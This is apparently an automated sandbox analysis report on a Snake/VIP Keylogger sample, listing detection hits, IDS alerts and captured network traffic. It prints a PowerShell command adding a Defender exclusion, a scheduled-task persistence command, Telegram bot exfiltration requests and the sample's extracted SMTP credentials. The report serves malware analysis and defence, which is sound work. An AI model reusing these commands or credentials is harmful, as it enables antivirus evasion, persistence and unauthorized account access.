Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ZTEIhNCtP3.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ZTEIhNCtP3.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ZTEIhNCtP3.exe", ParentImage: C:\Users\user\Desktop\ZTEIhNCtP3.exe, ParentProcessId: 6164, ParentProcessName: ZTEIhNCtP3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ZTEIhNCtP3.exe", ProcessId: 6324, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 568, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmp9D03.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmp9D03.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ZTEIhNCtP3.exe", ParentImage: C:\Users\user\Desktop\ZTEIhNCtP3.exe, ParentProcessId: 6164, ParentProcessName: ZTEIhNCtP3.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmp9D03.tmp", ProcessId: 6516, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:33:17.065730+0100	2803305	3	Unknown Traffic	192.168.2.7	49686	104.21.64.1	443	TCP
2025-03-07T16:33:20.512621+0100	2803305	3	Unknown Traffic	192.168.2.7	49691	104.21.64.1	443	TCP
2025-03-07T16:33:25.613680+0100	2803305	3	Unknown Traffic	192.168.2.7	49698	104.21.64.1	443	TCP
2025-03-07T16:33:26.132686+0100	2803305	3	Unknown Traffic	192.168.2.7	49699	104.21.64.1	443	TCP
2025-03-07T16:33:28.408205+0100	2803305	3	Unknown Traffic	192.168.2.7	49702	104.21.64.1	443	TCP
2025-03-07T16:33:31.327670+0100	2803305	3	Unknown Traffic	192.168.2.7	49705	104.21.32.1	443	TCP
2025-03-07T16:33:34.245370+0100	2803305	3	Unknown Traffic	192.168.2.7	49709	104.21.32.1	443	TCP
2025-03-07T16:33:35.397148+0100	2803305	3	Unknown Traffic	192.168.2.7	49711	104.21.32.1	443	TCP
2025-03-07T16:33:37.287959+0100	2803305	3	Unknown Traffic	192.168.2.7	49713	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:33:12.563893+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49684	132.226.247.73	80	TCP
2025-03-07T16:33:15.230414+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49684	132.226.247.73	80	TCP
2025-03-07T16:33:16.110686+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49687	132.226.247.73	80	TCP
2025-03-07T16:33:17.829308+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49689	132.226.247.73	80	TCP
2025-03-07T16:33:18.376191+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49687	132.226.247.73	80	TCP
2025-03-07T16:33:21.251220+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49693	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:33:40.424302+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49716	149.154.167.220	443	TCP
2025-03-07T16:33:44.202832+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49719	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "587", "Password": "sales002@tmcksa.com", "Host": "OFFICE12london12#", "Port": "587"}
Source: 00000000.00000002.909326738.00000000041E3000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sales002@tmcksa.com", "Password": "OFFICE12london12#", "Host": "smtppro.zoho.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: ZTEIhNCtP3.exe	Virustotal: Detection: 62%			Perma Link
Source: ZTEIhNCtP3.exe	ReversingLabs: Detection: 65%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack	String decryptor: sales002@tmcksa.com
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack	String decryptor: OFFICE12london12#
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack	String decryptor: smtppro.zoho.com
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack	String decryptor: 587
Source: 0.2.ZTEIhNCtP3.exe.3975420.1.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: ZTEIhNCtP3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49685 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49688 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49719 version: TLS 1.2

Source: ZTEIhNCtP3.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 0706C5B6h	0_2_0706CE52
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 02CBF45Dh	7_2_02CBF2C0
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 02CBF45Dh	7_2_02CBF4AC
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 02CBF45Dh	7_2_02CBF52F
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 02CBFC19h	7_2_02CBF970
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 0583D069h	7_2_0583CDC0
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 0583F781h	7_2_0583F4D8
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 0583EED1h	7_2_0583EC28
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 0583EA79h	7_2_0583E7D0
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 0583E1C9h	7_2_0583DF20
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 05833308h	7_2_05832EE6
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 05833308h	7_2_05832EF0
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_05830673
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 0583D919h	7_2_0583D670
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 0583FBD9h	7_2_0583F930
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 0583F329h	7_2_0583F080
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_05830040
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_05830853
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 05830D0Dh	7_2_05830B30
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 058316F8h	7_2_05830B30
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 0583E621h	7_2_0583E378
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 05832D41h	7_2_05832A90
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 0583DD71h	7_2_0583DAC8
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 0583D4C1h	7_2_0583D218
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 4x nop then jmp 05833308h	7_2_05833236
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0756B806h	8_2_0756C0A2
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0174F45Dh	12_2_0174F2C0
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0174F45Dh	12_2_0174F4AC
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0174FC19h	12_2_0174F961
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 07022D41h	12_2_07022A90
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 07023308h	12_2_07022EF0
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0702E1C9h	12_2_0702DF20
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 07020D0Dh	12_2_07020B30
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 070216F8h	12_2_07020B30
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0702E621h	12_2_0702E378
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0702EA79h	12_2_0702E7D0
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0702D4C1h	12_2_0702D218
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 07023308h	12_2_07023236
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0702D919h	12_2_0702D670
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0702DD71h	12_2_0702DAC8
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 07023308h	12_2_07022EEB
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0702FBD9h	12_2_0702F930
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0702D069h	12_2_0702CDC0
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0702EED1h	12_2_0702EC28
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_07020040
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0702F329h	12_2_0702F080
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 4x nop then jmp 0702F781h	12_2_0702F4D8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49719 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49716 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.7:49723 -> 204.141.43.24:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:651689%0D%0ADate%20and%20Time:%2008/03/2025%20/%2014:07:01%0D%0ACountry%20Name:%20United%20States%0D%0A[%20651689%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:651689%0D%0ADate%20and%20Time:%2008/03/2025%20/%2011:48:26%0D%0ACountry%20Name:%20United%20States%0D%0A[%20651689%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49693 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49684 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49687 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49689 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49698 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49699 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49686 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49705 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49709 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49691 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49713 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49711 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49702 -> 104.21.64.1:443

Source: global traffic

TCP traffic: 192.168.2.7:49723 -> 204.141.43.24:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49685 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49688 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:651689%0D%0ADate%20and%20Time:%2008/03/2025%20/%2014:07:01%0D%0ACountry%20Name:%20United%20States%0D%0A[%20651689%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:651689%0D%0ADate%20and%20Time:%2008/03/2025%20/%2011:48:26%0D%0ACountry%20Name:%20United%20States%0D%0A[%20651689%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
